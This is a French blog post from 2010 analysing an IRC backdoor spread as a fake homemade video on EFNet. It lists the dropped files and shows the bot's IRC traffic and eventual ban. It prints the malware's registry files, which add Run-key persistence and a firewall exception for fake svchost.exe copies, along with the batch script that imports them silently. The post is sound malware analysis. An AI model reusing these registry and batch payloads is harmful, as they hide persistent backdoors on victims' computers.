Monday, 6 September 2010

Backdoor.IRC

Well, aujourd'hui je me connecte sur IRC comme d'hab...
Quand tout à coup sur EFNet:

Quelqu'un que je ne connais pas m'envoie un message pour que je télécharge des photos hot...
Bon et bien c'est parti :)
J'extrais une archive zip avec des photos et un dossier

L'utilisateur va regarder les images et comme il n'y a pas d'exécutable va peut être se sentir en confiance par rapport au contenu, il ouvre le dossier /PrivateVideo/ et puis la vidéo
En réalité, un exécutable qui a l'icône de windows media player (6,53 Mb):
L'exécutable en faite va extraire un client IRC
un peut de stuff:
C:\WINDOWS\system32\wbem\mof\good\dmu.dll
C:\WINDOWS\system32\wbem\mof\good\svchost.exe
C:\WINDOWS\system32\wbem\Repository\FS\dmu.dll
C:\WINDOWS\system32\wbem\Repository\FS\svchost.exe

C:\Documents and Settings\Xylitol\Local Settings\Temp\1.reg
C:\Documents and Settings\Xylitol\Local Settings\Temp\2.reg
C:\Documents and Settings\Xylitol\Local Settings\Temp\3.reg
C:\Documents and Settings\Xylitol\Local Settings\Temp\More Free Picture And Videos here!!.bat
C:\WINDOWS\system32\igxftray.exe
Screen ci contre, le client en question:

cmd.exe est lancé (fichier  .bat)
igxftray.exe et lancé (exec)
regedit.exe et lancé (par le .bat)
Après l'infection installée, la vidéo et lancé "MOV000932" dans le répertoire /%temp%/

CBYTS - very very cute teen having sex PRIVATE HOMEMADE!.exe
et compressé par 'nBinder (c) NKProds 2007'

Fichiers temporaires extraits:

Mais que contiennent les .reg ? :o

1.reg:
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ifgxtray"="C:\\WINDOWS\\system32\\ifgxtray.exe"
"igxftray"="C:\\WINDOWS\\system32\\igxftray.exe"

2.reg:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\WINDOWS\\system32\\wbem\\Repository\\FS\\svchost.exe"="C:\\WINDOWS\\system32\\wbem\\Repository\\FS\\svchost.exe:*:Enabled:mIRC"
"C:\\WINDOWS\\system32\\wbem\\mof\\good\\svchost.exe"="C:\\WINDOWS\\system32\\wbem\\mof\\good\\svchost.exe:*:Enabled:mIRC"

3.reg:
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv]
"Application"="wmplayer.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\OpenWithList]
"a"="wmplayer.exe"
"MRUList"="a"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\OpenWithProgids]
@=hex(0):

More Free Picture And Videos here!!.bat:
@echo off
regedit /s 1.reg
regedit /s 2.reg
regedit /s 3.reg

Le fichier svchost.exe (client IRC)
se connecte à plusieurs networks
irc.allnetwork.org
irc.webchat.org
irc.efnet.net
irc.dal.net
irc.rizon.net
Etc...

Connexion avec un nick défini, sur des canaux eux aussi définis
NICK fallon
USER elfrida "" "irc.webchat.org" :on my lips
PING :31DC22A3
PONG :31DC22A3
:katana.webmaster.com 001 fallon :Welcome to the Internet Relay Chat network, fallon!elfrida@str90-1-xx-xx-xxx-xxx.fbx.proxad.net
:katana.webmaster.com 002 fallon :Your host is katana.webmaster.com [216.152.78.163:7000], running ConferenceRoom
:katana.webmaster.com 003 fallon :This server was started on Tue, 06 Jul 2010 19:45:33 0000 (Compiled on Oct 8 2009 13:22:41)
:katana.webmaster.com 004 fallon katana.webmaster.com ConferenceRoom/4.0.4-SEC abcdefghijkmnopqrstwxyzABCGIJLMRWX abcdeijklmnopqrstuvzACJLMNORU
:katana.webmaster.com 005 fallon CONFERENCEROOM WALLCHOPS WHISPER KNOCK LANG NICKLEN=30 WATCH=128 MKICK LAZYMOTD MODES=6 TOPICLEN=384 SILENCE=10 KICKLEN=64 :are supported on this server

[...]

:katana.webmaster.com 221 fallon :+ixpemJMn
UMODE -epmM
NICK :kristoforo
:fallon!elfrida@=wzvtz89-4-xx-xxx-xxx-xxx.fbx.proxad.net MODE fallon :-epmM
:fallon!elfrida@=wzvtz89-4-xx-xxx-xxx-xxx.fbx.proxad.net NICK :kristoforo
JOIN #ayu,#pilah
:kristoforo!elfrida@=wzvtz89-4-xx-xxx-xxx-xxx.fbx.proxad.net JOIN :#ayu
:katana.webmaster.com 332 kristoforo #ayu :.13,1(TOP) Pemenang Bulanan Aug ::. pinly .[ 73876 ] ::. gurl-frenz .[ 60864.5 ] ::. ErMM138 .[ 55124.5 ] ::. KiLLer_GiG .[ 32658 ] ::. nurcute .[ 23385 ] ::. ZaCk_ArEe .[ 6199.5 ] ::. kudabiru .[ 4625 ] ::. aircoked .[ 3787.5 ] ::. SimboL .[ 3457.5 ] ::. boyz-frenz .[ 2687.5 ] .. .W.E.L.cO.M.E. .T.O.. #ayu ... .h.a.v.e. .a. .g.o.o.d. .d.a.y. .h.e.r.e.!. .
:katana.webmaster.com 333 kristoforo #ayu Trivia.Bot 1283477972

[...]

MODE #ayu
MODE #pilah
:katana.webmaster.com 324 kristoforo #ayu +enrt
:katana.webmaster.com 329 kristoforo #ayu 1279155408
:katana.webmaster.com 324 kristoforo #pilah +mnrst
:katana.webmaster.com 329 kristoforo #pilah 1279623103
JOIN #ircRPG
:kristoforo!elfrida@=wzvtz89-4-xx-xxx-xxx-xxx.fbx.proxad.net JOIN :#ircRPG
:katana.webmaster.com 332 kristoforo #ircRPG :lets play irc rpg game type !rpghelp for more info
:katana.webmaster.com 333 kristoforo #ircRPG espanyol 1280816561
:katana.webmaster.com 353 kristoforo = #ircRPG :kristoforo mariejeanne +kavindra +madge Guest34980 justino +rand NT4H jameson cesya +lilla +lynnett @Remyz Dhiyauddin Hasyimah ignitEd leelah jorrie charla clarisse mendel lani dalila
:katana.webmaster.com 366 kristoforo #ircRPG :End of /NAMES list.
MODE #ircRPG
:katana.webmaster.com 324 kristoforo #ircRPG +nrst
:katana.webmaster.com 329 kristoforo #ircRPG 1282969660
JOIN #sheila,#dark

[...]

:lauretta!feodora@xxx.xxx.xxx.wt919= JOIN :#ayu
:lauretta!feodora@xxx.xxx.xxx.wt919= JOIN :#pilah
:mercie!maxy@xxx.xxx.xxx.wt919= JOIN :#ayu
:mercie!maxy@xxx.xxx.xxx.wt919= JOIN :#pilah
:netty!cenderajiw@xxx.xxx.xxx.Ye60= JOIN :#GrindCore
:glenine!cenderajiw@xxx.xxx.xxx.Ye60= JOIN :#GrindCore
:graig!cenderajiw@xxx.xxx.xxx.Ye60= JOIN :#GrindCore
:rand!jeane@xxx.xxx.xxx.0Q845= PRIVMSG #ircRPG :isk :P
:rand!jeane@xxx.xxx.xxx.0Q845= PRIVMSG #ircRPG :.ACTION ok all.
:JPJ!android@xxx.xxx.xxx.3Q435= JOIN :#ayu
:ChanServ!service@webmaster.com MODE #ayu +o JPJ

Le client réceptionne même des retours du style:
:katana.webmaster.com 485 kristoforo #Kuiz :Cannot join channel: Too many users from your IP are already in the channel..

le malware liste les utilisateurs connectés et commence à spammé les nouveaux arrivants

Au final on se retrouve bann, et c'est ten mieux:
* *** Banned Temporary K-line 7200 min. - [G] You have have matched a drone/bot pattern - Please visit http://www.rizon.net/index.php?do=kline&section=dnsbl&ip=XX.XXX.XXX.XXX for more information (Akill ID: BZDCHX767S) (2010/9/6 11.29)


VT: http://www.virustotal.com/file-scan/report.html?id=29484cd99635c6a6e4aa4b42da549dcd4396965be1e79a6b1b55999f50ef015a-1283766184
According to MAD:
C'est assez fréquent de voir de telles choses, un mIRC + des scripts dissimulés.

1 comment: